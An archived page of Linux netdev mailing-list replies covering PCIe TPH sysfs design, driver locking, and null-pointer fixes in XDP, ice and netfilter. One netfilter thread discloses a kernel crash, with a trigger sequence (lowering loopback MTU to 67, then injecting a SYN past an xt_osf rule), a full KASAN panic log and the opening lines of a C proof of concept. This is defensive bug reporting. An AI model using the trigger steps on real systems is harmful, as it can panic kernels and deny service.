* Re: [RFC] Proposal: Add sysfs interface for PCIe TPH Steering Tag retrieval and configuration
From: Leon Romanovsky @ 2026-04-14 8:57 UTC
To: fengchengwen
Cc: Jason Gunthorpe, Bjorn Helgaas, linux-rdma, linux-pci, netdev,
dri-devel, Keith Busch, Yochai Cohen, Yishai Hadas, Zhiping Zhang
In-Reply-To: <b95ced54-339f-4859-b3eb-8bf261393ffc@huawei.com>
On Tue, Apr 14, 2026 at 09:07:23AM +0800, fengchengwen wrote:
> On 4/14/2026 3:19 AM, Leon Romanovsky wrote:
> > On Mon, Apr 13, 2026 at 08:04:10PM +0800, fengchengwen wrote:
> >> On 4/13/2026 6:01 PM, Leon Romanovsky wrote:
> >>> On Fri, Apr 10, 2026 at 10:30:52PM +0800, fengchengwen wrote:
> >>>> Hi all,
> >>>>
> > >>>> I'm writing to propose adding a sysfs interface to expose and configure
> > >>>> the PCIe TPH Steering Tag of PCIe devices, which can currently only be
> > >>>> retrieved inside the kernel.
> >>>>
> >>>>
> > >>>> Background: The TPH Steering Tag is tightly coupled with both a PCIe device
> > >>>> (identified by its BDF) and a CPU core. It can only be obtained in kernel
> > >>>> mode. To allow user-space applications to fetch and set this value
> > >>>> securely and conveniently, we need a standard kernel-to-user interface.
> >>>>
> >>>>
> > >>>> Proposed Solution: Add several sysfs attributes under each PCIe device's
> > >>>> sysfs directory:
> > >>>> 1. /sys/bus/pci/devices/<BDF>/tph_mode to query the TPH mode (interrupt
> > >>>>    vector or device specific)
> > >>>> 2. /sys/bus/pci/devices/<BDF>/tph_enable to control the TPH feature
> > >>>> 3. /sys/bus/pci/devices/<BDF>/tph_st to support both read and write
> > >>>>    operations, e.g.:
> > >>>>    Read operation:
> > >>>>      echo "cpu=3" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> > >>>>      cat /sys/bus/pci/devices/0000:01:00.0/tph_st
> > >>>>    Write operation:
> > >>>>      echo "index=10 st=123" > /sys/bus/pci/devices/0000:01:00.0/tph_st
> >>>>
> >>>>
> > >>>> The design strictly follows PCI subsystem sysfs standards and has the
> > >>>> following key properties:
> > >>>>
> > >>>> 1. Dynamic Visibility: The sysfs attributes will only be present for PCIe
> > >>>> devices that support TPH Steering Tag. Devices without TPH capability
> > >>>> will not show these nodes, avoiding unnecessary user confusion.
> > >>>>
> > >>>> 2. Permission Control: The attributes will use 0600 file permissions,
> > >>>> ensuring only privileged root users can read or write them, which
> > >>>> satisfies security requirements for hardware configuration interfaces.
> > >>>>
> > >>>> 3. Standard Implementation Location: The interface will be implemented in
> > >>>> drivers/pci/pci-sysfs.c, the canonical location for all PCI device sysfs
> > >>>> attributes, ensuring consistency and maintainability within the PCI
> > >>>> subsystem.
> >>>>
> >>>>
> > >>>> Why sysfs instead of alternatives like VFIO-PCI ioctl:
> > >>>>
> > >>>> - Universality: sysfs does not require binding the device to a special
> > >>>> driver such as vfio-pci. It is available to any privileged user-space
> > >>>> component, including system utilities, daemons, and monitoring tools.
> > >>>>
> > >>>> - Simplicity: Both user-space usage (cat/echo) and kernel implementation are
> > >>>> straightforward, reducing code complexity and long-term maintenance cost.
> > >>>>
> > >>>> - Design Alignment: TPH Steering Tag is a generic PCIe device feature, not
> > >>>> specific to user-space drivers like DPDK or VFIO. Exposing it via sysfs
> > >>>> matches the kernel's standard pattern for hardware capabilities.
> >>>>
> >>>>
> > >>>> I look forward to your comments on this design before submitting the
> > >>>> final patch.
> >>>
> >>> You need to explain more clearly why this write functionality is useful
> >>> and necessary outside the VFIO/RDMA context:
> >>> https://lore.kernel.org/all/20260324234615.3731237-1-zhipingz@meta.com/
> >>>
> >>> AFAIK, for non-VFIO TPH callers, kernel has enough knowledge to set
> >>> right ST values.
> >>>
> >>> There are several comments regarding the implementation, but those can wait
> >>> until the rationale behind the proposal is fully clarified.
> >>
> >> Thanks for your review and comments.
> >>
> >> Let me clarify the rationale behind this user-space sysfs interface:
> >>
> >> 1. VFIO is just one of the user-space device access frameworks.
> >> There are many other in-kernel frameworks that expose devices
> >> to user space, such as UIO, UACCE, etc., which may also require
> >> TPH Steering Tag support.
> >>
> >> 2. The kernel can automatically program Steering Tags only when
> >> the device provides a standard ST table in MSI-X or config space.
> >> However, many devices implement vendor-specific or platform-specific
> >> Steering Tag programming methods that cannot be fully handled
> >> by the generic kernel code.
> >>
> >> 3. For such devices, user-space applications or framework drivers
> >> need to retrieve and configure TPH Steering Tags directly.
> >> A unified sysfs interface allows all user-space frameworks
> >> (not just VFIO) to use a common, standard way to manage
> >> TPH Steering Tags, rather than implementing duplicated logic
> >> in each subsystem.
> >>
> >> This interface provides a uniform method for any user-space
> >> device access solution to work with TPH, which is why I believe
> >> it is useful and necessary beyond the VFIO/RDMA case.
> >
> > I understand the rationale for providing a read interface, for example for
> > debugging, but I do not see any justification for a write interface.
>
> Thank you for the comment!
>
> As I explained, the read interface is not only for debugging. It is needed
> for devices that do not declare the ST location in the MSI-X table or config
> space. The following is the lspci output of an Intel X710 NIC (TPH part only):
>
> 	Capabilities: [1a0 v1] Transaction Processing Hints
> 		Device specific mode supported
> 		No steering table available
>
> So the kernel cannot configure the ST for this device, because the mechanism
> is vendor specific. The vendor's user-space driver can configure it, however,
> and in that case the ST value has to be passed from the kernel to user space.
Vendor-specific, in the context of the PCI specification, does not mean the
kernel cannot configure it. It simply means that the ST values are not
stored in the ST table.
Thanks
* Re: [net,PATCH v2] net: ks8851: Reinstate disabling of BHs around IRQ handler
From: Sebastian Andrzej Siewior @ 2026-04-14 8:55 UTC
To: Marek Vasut
Cc: Jakub Kicinski, netdev, stable, David S. Miller, Andrew Lunn,
Eric Dumazet, Nicolai Buchwitz, Paolo Abeni, Ronald Wahl,
Yicong Hui, linux-kernel, Thomas Gleixner
In-Reply-To: <20260413160336.GQCaw-1d@linutronix.de>
On 2026-04-13 18:03:38 [+0200], To Marek Vasut wrote:
> On 2026-04-13 17:31:34 [+0200], Marek Vasut wrote:
> > > I don't see why it needs to disable interrupts.
> >
> > Because when the lock is held, the PAR code shouldn't be interrupted by an
> > interrupt, otherwise it would completely mess up the state of the KS8851
> > MAC. The spinlock does not protect only the IRQ handler, it protects also
> > ks8851_start_xmit_par() and ks8851_write_mac_addr() and
> > ks8851_read_mac_addr() and ks8851_net_open() and ks8851_net_stop() and other
> > sites which call ks8851_lock()/ks8851_unlock() which cannot be executed
> > concurrently, but where BHs can be enabled.
>
> I need to check this once my brain is at full power again. But which
> interrupt? Your interrupt is threaded. So that should be okay.
I don't understand. There is no point in using spin_lock_irqsave() in
ks8851_lock_par(). You don't protect against interrupts because none of
the users actually run in interrupt context. As far as I can see, the
interrupt is threaded and the MDIO PHY link checks should come from the
workqueue.
What is wrong is that the ndo_start_xmit callback can be invoked from a
softirq, so you must disable BHs while acquiring a lock that can be
accessed from both contexts. Therefore spin_lock() is not sufficient; it
needs the _bh() variant, and _irq() brings no additional value here.
Sebastian
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:55 UTC
To: Kito Xu (veritas501)
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <20260414083703.2531953-1-hxzene@gmail.com>
On Tue, Apr 14, 2026 at 04:37:02PM +0800, Kito Xu (veritas501) wrote:
> From: Kito Xu <hxzene@gmail.com>
>
> Hi Pablo,
>
> On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> > How could skb->dev be NULL !?
>
> skb->dev is NOT NULL. The NULL value is `in_dev` returned by
> __in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
> inetdev_destroy().
A more detailed report helps.
> > This is run from prerouting, input and forward.
>
> Correct. The crash path is in PREROUTING on lo.
>
> > I cannot believe this, I think AI is mocking KASAN splat, if that is
> > the case, I am sorry to say, but it is too bad if you are doing this.
>
> This is a real bug with a reproducible PoC. I understand the KASAN
> output in my original patch email looked suspicious because it was
> interleaved with the PoC's stderr output (the PoC prints debug lines
> while the kernel oops scrolls by simultaneously). That was a formatting
> mistake on my part.
No need for PoC, just a bit more details is enough.
Thanks for explaining.
* Re: [PATCH net v7 1/2] net, bpf: fix null-ptr-deref in xdp_master_redirect() for down master
From: Paolo Abeni @ 2026-04-14 8:53 UTC
To: Jiayuan Chen, netdev, Daniel Borkmann
Cc: syzbot+80e046b8da2820b6ba73, Martin KaFai Lau, John Fastabend,
Stanislav Fomichev, Alexei Starovoitov, Andrii Nakryiko,
Eduard Zingerman, Song Liu, Yonghong Song, KP Singh, Hao Luo,
Jiri Olsa, David S. Miller, Eric Dumazet, Jakub Kicinski,
Simon Horman, Jesper Dangaard Brouer, Shuah Khan, Jussi Maki, bpf,
linux-kernel, linux-kselftest
In-Reply-To: <20260411005524.201200-2-jiayuan.chen@linux.dev>
On 4/11/26 2:55 AM, Jiayuan Chen wrote:
> syzkaller reported a kernel panic in bond_rr_gen_slave_id() reached via
> xdp_master_redirect(). Full decoded trace:
>
> https://syzkaller.appspot.com/bug?extid=80e046b8da2820b6ba73
>
> bond_rr_gen_slave_id() dereferences bond->rr_tx_counter, a per-CPU
> counter that bonding only allocates in bond_open() when the mode is
> round-robin. If the bond device was never brought up, rr_tx_counter
> stays NULL.
>
> The XDP redirect path can still reach that code on a bond that was
> never opened: bpf_master_redirect_enabled_key is a global static key,
> so as soon as any bond device has native XDP attached, the
> XDP_TX -> xdp_master_redirect() interception is enabled for every
> slave system-wide. The path xdp_master_redirect() ->
> bond_xdp_get_xmit_slave() -> bond_xdp_xmit_roundrobin_slave_get() ->
> bond_rr_gen_slave_id() then runs against a bond that has no
> rr_tx_counter and crashes.
>
> Fix this in the generic xdp_master_redirect() by refusing to call into
> the master's ->ndo_xdp_get_xmit_slave() when the master device is not
> up. IFF_UP is only set after ->ndo_open() has successfully returned,
> so this reliably excludes masters whose XDP state has not been fully
> initialized. Drop the frame with XDP_ABORTED so the exception is
> visible via trace_xdp_exception() rather than silently falling through.
> This is not specific to bonding: any current or future master that
> defers XDP state allocation to ->ndo_open() is protected.
>
> Fixes: 879af96ffd72 ("net, core: Add support for XDP redirection to slave device")
> Reported-by: syzbot+80e046b8da2820b6ba73@syzkaller.appspotmail.com
> Closes: https://lore.kernel.org/all/698f84c6.a70a0220.2c38d7.00cc.GAE@google.com/T/
> Suggested-by: Daniel Borkmann <daniel@iogearbox.net>
> Acked-by: Daniel Borkmann <daniel@iogearbox.net>
> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
> ---
> net/core/filter.c | 2 ++
> 1 file changed, 2 insertions(+)
>
> diff --git a/net/core/filter.c b/net/core/filter.c
> index cf2113af4bc9..9ec70c4b7723 100644
> --- a/net/core/filter.c
> +++ b/net/core/filter.c
> @@ -4398,6 +4398,8 @@ u32 xdp_master_redirect(struct xdp_buff *xdp)
>  	struct net_device *master, *slave;
>
>  	master = netdev_master_upper_dev_get_rcu(xdp->rxq->dev);
> +	if (unlikely(!(master->flags & IFF_UP)))
> +		return XDP_ABORTED;
>  	slave = master->netdev_ops->ndo_xdp_get_xmit_slave(master, xdp);
The AI review noted that `master` could (theoretically) be NULL here.
Since that is not a regression (the unconditional `master` dereference is
already present), and syzkaller failed to trigger it (despite this being
the sort of thing syzkaller is very good at finding), I think it's better
to address it in a follow-up instead of requesting another revision here,
but please have a look.
Thanks,
Paolo
>  	if (slave && slave != xdp->rxq->dev) {
>  		/* The target device is different from the receiving device, so
* Re: [PATCH iwl-next 1/10] ice: translate FW to SW for max num TCs encoding
From: Simon Horman @ 2026-04-14 8:44 UTC
To: Aleksandr Loktionov
Cc: intel-wired-lan, anthony.l.nguyen, netdev, Dave Ertman
In-Reply-To: <20260410074921.1254213-2-aleksandr.loktionov@intel.com>
On Fri, Apr 10, 2026 at 09:49:12AM +0200, Aleksandr Loktionov wrote:
> From: Dave Ertman <david.m.ertman@intel.com>
>
> The FW uses a 3-bit field in a TLV to represent the maximum number of
> Traffic Classes supported per interface. Since the maximum value is 8,
> and at least one TC must be supported, the encoding uses bit values of
> 000 to represent 8 TCs.
>
> The driver currently does not translate this value and reports 0 max TCs
> to the DCBNL interface instead of 8.
>
> Add a translation when interfacing with the FW to use 0x0 as the value
> for 8 max TCs.
>
> Signed-off-by: Dave Ertman <david.m.ertman@intel.com>
> Signed-off-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
I'm not sure if you want to reconsider this as a bug fix.
But the code changes look good to me.
Reviewed-by: Simon Horman <horms@kernel.org>
* RE: [PATCH iwl-net] ice: fix infinite recursion in ice_cfg_tx_topo via ice_init_dev_hw
From: Loktionov, Aleksandr @ 2026-04-14 8:43 UTC
To: Oros, Petr, netdev@vger.kernel.org
Cc: Oros, Petr, Nguyen, Anthony L, Kitszel, Przemyslaw, Andrew Lunn,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Nikolay Aleksandrov, Daniel Zahka, Greenwalt, Paul,
Ertman, David M, Michal Swiatkowski, Keller, Jacob E,
intel-wired-lan@lists.osuosl.org, linux-kernel@vger.kernel.org
In-Reply-To: <20260413191420.3524013-1-poros@redhat.com>
> -----Original Message-----
> From: Petr Oros <poros@redhat.com>
> Sent: Monday, April 13, 2026 9:14 PM
> To: netdev@vger.kernel.org
> Cc: Oros, Petr <poros@redhat.com>; Nguyen, Anthony L
> <anthony.l.nguyen@intel.com>; Kitszel, Przemyslaw
> <przemyslaw.kitszel@intel.com>; Andrew Lunn <andrew+netdev@lunn.ch>;
> David S. Miller <davem@davemloft.net>; Eric Dumazet
> <edumazet@google.com>; Jakub Kicinski <kuba@kernel.org>; Paolo Abeni
> <pabeni@redhat.com>; Loktionov, Aleksandr
> <aleksandr.loktionov@intel.com>; Nikolay Aleksandrov
> <razor@blackwall.org>; Daniel Zahka <daniel.zahka@gmail.com>;
> Greenwalt, Paul <paul.greenwalt@intel.com>; Ertman, David M
> <david.m.ertman@intel.com>; Michal Swiatkowski
> <michal.swiatkowski@linux.intel.com>; Keller, Jacob E
> <jacob.e.keller@intel.com>; intel-wired-lan@lists.osuosl.org; linux-
> kernel@vger.kernel.org
> Subject: [PATCH iwl-net] ice: fix infinite recursion in
> ice_cfg_tx_topo via ice_init_dev_hw
>
> On certain E810 configurations where firmware supports Tx scheduler
> topology switching (tx_sched_topo_comp_mode_en), ice_cfg_tx_topo() may
> need to apply a new 5-layer or 9-layer topology from the DDP package.
> If the AQ command to set the topology fails (e.g. due to invalid DDP
> data or firmware limitations), the global configuration lock must
> still be cleared via a CORER reset.
>
> Commit 86aae43f21cf ("ice: don't leave device non-functional if Tx
> scheduler config fails") correctly fixed this by refactoring
> ice_cfg_tx_topo() to always trigger CORER after acquiring the global
> lock and re-initialize hardware via ice_init_hw() afterwards.
>
> However, commit 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end
> of deinit paths") later moved ice_init_dev_hw() into ice_init_hw(),
> breaking the reinit path introduced by 86aae43f21cf. This creates an
> infinite recursive call chain:
>
>   ice_init_hw()
>     ice_init_dev_hw()
>       ice_cfg_tx_topo()         # topology change needed
>         ice_deinit_hw()
>         ice_init_hw()           # reinit after CORER
>           ice_init_dev_hw()     # recurse
>             ice_cfg_tx_topo()
>               ...               # stack overflow
>
> Fix by moving ice_init_dev_hw() back out of ice_init_hw() and calling
> it explicitly from ice_probe() and ice_devlink_reinit_up(). The third
> caller, ice_cfg_tx_topo(), intentionally does not need
> ice_init_dev_hw() during its reinit; it only needs the core HW
> reinitialization. This breaks the recursion cleanly without adding
> flags or guards.
>
> The deinit ordering changes from commit 8a37f9e2ff40 ("ice: move
> ice_deinit_dev() to the end of deinit paths"), which fixed slow rmmod,
> are preserved; only the init-side placement of ice_init_dev_hw() is
> reverted.
>
> Fixes: 8a37f9e2ff40 ("ice: move ice_deinit_dev() to the end of deinit paths")
> Signed-off-by: Petr Oros <poros@redhat.com>
> ---
> drivers/net/ethernet/intel/ice/devlink/devlink.c | 2 ++
> drivers/net/ethernet/intel/ice/ice_common.c | 2 --
> drivers/net/ethernet/intel/ice/ice_main.c | 2 ++
> 3 files changed, 4 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/intel/ice/devlink/devlink.c b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> index 6144cee8034d77..641d6e289d5ce6 100644
> --- a/drivers/net/ethernet/intel/ice/devlink/devlink.c
> +++ b/drivers/net/ethernet/intel/ice/devlink/devlink.c
> @@ -1245,6 +1245,8 @@ static int ice_devlink_reinit_up(struct ice_pf *pf)
>  		return err;
>  	}
>
> +	ice_init_dev_hw(pf);
> +
>  	/* load MSI-X values */
>  	ice_set_min_max_msix(pf);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_common.c b/drivers/net/ethernet/intel/ice/ice_common.c
> index ce11fea122d03e..b617a6bff89134 100644
> --- a/drivers/net/ethernet/intel/ice/ice_common.c
> +++ b/drivers/net/ethernet/intel/ice/ice_common.c
> @@ -1126,8 +1126,6 @@ int ice_init_hw(struct ice_hw *hw)
>  	if (status)
>  		goto err_unroll_fltr_mgmt_struct;
>
> -	ice_init_dev_hw(hw->back);
> -
>  	mutex_init(&hw->tnl_lock);
>  	ice_init_chk_recipe_reuse_support(hw);
>
> diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
> index e2a5534819d194..a27be29f9bbbfc 100644
> --- a/drivers/net/ethernet/intel/ice/ice_main.c
> +++ b/drivers/net/ethernet/intel/ice/ice_main.c
> @@ -5314,6 +5314,8 @@ ice_probe(struct pci_dev *pdev, const struct pci_device_id __always_unused *ent)
>  		return err;
>  	}
>
> +	ice_init_dev_hw(pf);
> +
>  	adapter = ice_adapter_get(pdev);
>  	if (IS_ERR(adapter)) {
>  		err = PTR_ERR(adapter);
> --
> 2.52.0
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Kito Xu (veritas501) @ 2026-04-14 8:37 UTC
To: pablo
Cc: coreteam, davem, edumazet, ffmancera, fw, horms, hxzene, kuba,
linux-kernel, netdev, netfilter-devel, pabeni, phil
In-Reply-To: <ad35LhIOSaEDJAhS@chamomile>
From: Kito Xu <hxzene@gmail.com>
Hi Pablo,
On Tue, Apr 14, 2026 at 10:22:06AM +0200, Pablo Neira Ayuso wrote:
> How could skb->dev be NULL !?
skb->dev is NOT NULL. The NULL value is `in_dev` returned by
__in_dev_get_rcu(skb->dev), because dev->ip_ptr is NULL after
inetdev_destroy().
> This is run from prerouting, input and forward.
Correct. The crash path is in PREROUTING on lo.
> I cannot believe this, I think AI is mocking KASAN splat, if that is
> the case, I am sorry to say, but it is too bad if you are doing this.
This is a real bug with a reproducible PoC. I understand the KASAN
output in my original patch email looked suspicious because it was
interleaved with the PoC's stderr output (the PoC prints debug lines
while the kernel oops scrolls by simultaneously). That was a formatting
mistake on my part.
Let me clarify the root cause and provide a clean KASAN report.
## Root Cause
nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
to in_dev_for_each_ifa_rcu() without a NULL check:
    static inline int nf_osf_ttl(const struct sk_buff *skb,
                                 int ttl_check, unsigned char f_ttl)
    {
        struct in_device *in_dev = __in_dev_get_rcu(skb->dev);
        ...
        /* ttl_check == NF_OSF_TTL_LESS, ip->ttl > f_ttl → falls through */
        in_dev_for_each_ifa_rcu(ifa, in_dev) {  /* NULL deref when in_dev == NULL */
        ...

in_dev_for_each_ifa_rcu expands to:

    for (ifa = rcu_dereference((in_dev)->ifa_list); ...)
When in_dev is NULL, (NULL)->ifa_list is a NULL dereference at offset
0x10, which matches the KASAN report: null-ptr-deref in range
[0x0000000000000010-0x0000000000000017].
## How ip_ptr becomes NULL
The loopback driver (loopback.c) does NOT call ether_setup(), so
dev->min_mtu remains 0. This allows setting MTU below IPV4_MIN_MTU
(68). Setting lo MTU to 67 triggers:
    NETDEV_CHANGEMTU event
      → inetdev_valid_mtu(67) == false
      → inetdev_destroy(in_dev)
      → RCU_INIT_POINTER(dev->ip_ptr, NULL)
After this, lo can still receive packets (loopback_xmit → __netif_rx),
but __in_dev_get_rcu(lo) returns NULL.
## Trigger sequence
1. Load OSF fingerprint (genre=Linux, ttl=64, ttl_check=TTL_LESS)
2. Set up iptables raw PREROUTING rule with xt_osf match
3. Set lo MTU to 67 → inetdev_destroy → ip_ptr = NULL
4. Inject SYN (TTL=255 > f_ttl 64) via AF_PACKET on lo
5. ip_rcv → PREROUTING → xt_osf → nf_osf_ttl() → NULL deref
## Clean KASAN report (from separate capture, no interleaving)
```
[ 2.873592] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000002: 0000 [#1] SMP KASAN NOPTI
[ 2.878162] KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]
[ 2.881836] CPU: 0 UID: 0 PID: 169 Comm: poc Not tainted 7.0.0-rc7-next-20260410+ #11 PREEMPTLAZY
[ 2.885160] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 2.889197] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 2.891768] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 2.898548] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 2.900439] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 2.903090] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 2.906785] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 2.909418] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 2.912058] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 2.914978] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 2.917975] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.920236] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 2.922952] Call Trace:
[ 2.923947] <IRQ>
[ 2.924779] nf_osf_match+0x2f8/0x780
[ 2.926183] ? __pfx_nf_osf_match+0x10/0x10
[ 2.928630] ? kvm_sched_clock_read+0x11/0x20
[ 2.930946] ? local_clock+0x15/0x30
[ 2.933963] ? kasan_save_track+0x26/0x60
[ 2.936266] ? __pfx__raw_spin_lock+0x10/0x10
[ 2.938605] xt_osf_match_packet+0x11c/0x1f0
[ 2.940360] ipt_do_table+0x7fe/0x12b0
[ 2.942846] ? __pfx_ipt_do_table+0x10/0x10
[ 2.944267] ? __pfx___smp_call_single_queue+0x10/0x10
[ 2.946109] ? __pfx___netif_receive_skb_core.constprop.0+0x10/0x10
[ 2.949929] nf_hook_slow+0xac/0x1e0
[ 2.951288] ip_rcv+0x123/0x370
[ 2.952544] ? __pfx_ip_rcv+0x10/0x10
[ 2.954789] ? tryinc_node_nr_active+0xe6/0x160
[ 2.956407] ? __pfx_ip_rcv_finish+0x10/0x10
[ 2.958990] ? __smp_call_single_queue+0x2c7/0x480
[ 2.960907] ? __pfx_ip_rcv+0x10/0x10
[ 2.962315] __netif_receive_skb_one_core+0x166/0x1b0
[ 2.964374] ? __pfx___netif_receive_skb_one_core+0x10/0x10
[ 2.966465] ? _raw_spin_lock_irq+0x8a/0xe0
[ 2.968828] ? update_cfs_rq_load_avg+0x5a/0x560
[ 2.970585] process_backlog+0x197/0x590
[ 2.973489] __napi_poll+0xa1/0x540
[ 2.974887] net_rx_action+0x401/0xd80
[ 2.976358] ? __pfx_net_rx_action+0x10/0x10
[ 2.977973] ? timerqueue_linked_add+0x1f4/0x3d0
[ 2.980634] handle_softirqs+0x19f/0x610
[ 2.982012] ? __pfx_handle_softirqs+0x10/0x10
[ 2.984853] do_softirq.part.0+0x3b/0x60
[ 2.986360] </IRQ>
[ 2.987161] <TASK>
[ 2.987845] __local_bh_enable_ip+0x64/0x70
[ 2.989320] __dev_queue_xmit+0x9f7/0x3100
[ 2.990853] ? kvm_clock_get_cycles+0x18/0x30
[ 2.992377] ? ktime_get+0xeb/0x160
[ 2.994640] ? __pfx_skb_set_owner_w+0x10/0x10
[ 2.996116] ? __pfx___dev_queue_xmit+0x10/0x10
[ 2.997850] ? __pfx__copy_from_iter+0x10/0x10
[ 2.999529] ? packet_parse_headers+0x342/0x6b0
[ 3.002132] ? __pfx_packet_parse_headers+0x10/0x10
[ 3.003983] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.005551] packet_sendmsg+0x21c2/0x5580
[ 3.007039] ? tty_compat_ioctl+0x238/0x500
[ 3.008445] ? __pfx_ldsem_down_read+0x10/0x10
[ 3.010973] ? _raw_spin_lock_irqsave+0x95/0xf0
[ 3.012634] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
[ 3.014620] ? __pfx_packet_sendmsg+0x10/0x10
[ 3.016292] ? __pfx_aa_sk_perm+0x10/0x10
[ 3.017657] ? __check_object_size+0x4b/0x650
[ 3.019888] __sys_sendto+0x34e/0x3a0
[ 3.021353] ? __pfx___sys_sendto+0x10/0x10
[ 3.022854] ? alloc_fd+0x33b/0x5b0
[ 3.024081] ? ksys_write+0xfc/0x1d0
[ 3.025333] ? __pfx_ksys_write+0x10/0x10
[ 3.027069] __x64_sys_sendto+0xe0/0x1c0
[ 3.028593] do_syscall_64+0x64/0x680
[ 3.030069] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 3.032055] RIP: 0033:0x4243f7
[ 3.033269] Code: ff ff f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 6d bc 08 00 00 41 89 ca 74 10 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 69 c3 55 48 89 e5 53 48 83 ec 38 44 89 4d d0
[ 3.039978] RSP: 002b:00007ffc7ab0e508 EFLAGS: 00000202 ORIG_RAX: 000000000000002c
[ 3.042801] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00000000004243f7
[ 3.045585] RDX: 0000000000000036 RSI: 00007ffc7ab0e590 RDI: 0000000000000003
[ 3.048006] RBP: 00007ffc7ab0e5d0 R08: 00007ffc7ab0e540 R09: 0000000000000014
[ 3.050552] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffc7ab0e6f8
[ 3.053184] R13: 00007ffc7ab0e708 R14: 00000000004aaf68 R15: 0000000000000001
[ 3.055872] </TASK>
[ 3.056758] Modules linked in:
[ 3.057796] ---[ end trace 0000000000000000 ]---
[ 3.059605] RIP: 0010:nf_osf_match_one+0x204/0xa70
[ 3.061034] Code: 7f 08 84 c0 0f 85 46 06 00 00 41 3a 4c 24 08 0f 83 17 01 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7f 10 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 f8 07 00 00 49 8b 5f 10 48 85 db 0f 84 8f fe ff
[ 3.067353] RSP: 0018:ffffc90000007740 EFLAGS: 00010212
[ 3.069348] RAX: dffffc0000000000 RBX: ffffc90000007878 RCX: 0000000000000040
[ 3.072135] RDX: 0000000000000002 RSI: ffff88800b4f30c0 RDI: 0000000000000010
[ 3.074613] RBP: ffff88800fca4820 R08: 0000000000000000 R09: 0000000000000000
[ 3.076982] R10: 0000000000000001 R11: ffff88800b4b7680 R12: ffff88800b4f30d0
[ 3.079532] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000
[ 3.082213] FS: 0000000013b96380(0000) GS:ffff8880e2489000(0000) knlGS:0000000000000000
[ 3.085348] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.087128] CR2: 00000000004a0000 CR3: 000000000fa3f000 CR4: 00000000003006f0
[ 3.089429] Kernel panic - not syncing: Fatal exception in interrupt
[ 3.092322] Kernel Offset: disabled
[ 3.093649] Rebooting in 1 seconds..
```
## PoC (standalone C, requires root, compiles with musl or glibc)
```c
/*
* PoC: nf_osf_ttl() NULL pointer dereference (nfnetlink_osf.c)
*
* Trigger: lo MTU set to 67 (< IPV4_MIN_MTU=68) via ioctl
* → NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
* → inetdev_destroy(lo) → RCU_INIT_POINTER(lo->ip_ptr, NULL)
*
* SYN injected via AF_PACKET on lo → loopback_xmit
* → eth_type_trans → __netif_rx → ip_rcv → PREROUTING
* → xt_osf → nf_osf_match → nf_osf_match_one
* → nf_osf_ttl(skb, TTL_LESS=1, f_ttl=64)
* L34: in_dev = __in_dev_get_rcu(lo) → NULL
* L46: in_dev_for_each_ifa_rcu(ifa, NULL) → CRASH
*
* Requirements (all built-in in target kernel):
* CONFIG_IP_NF_RAW=y, CONFIG_NETFILTER_XT_MATCH_OSF=y,
* CONFIG_NETFILTER_NETLINK_OSF=y, CONFIG_PANIC_ON_OOPS=y
*
* Run as root.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if.h>
#include <linux/netlink.h>
/* ------------------------------------------------------------------ */
/* Inline netfilter/x_tables/OSF definitions to avoid extra UAPI headers; */
/* netlink basics (NLMSG_*, NLA_*, NLM_F_*) come from <linux/netlink.h>. */
/* ------------------------------------------------------------------ */
/* nfnetlink */
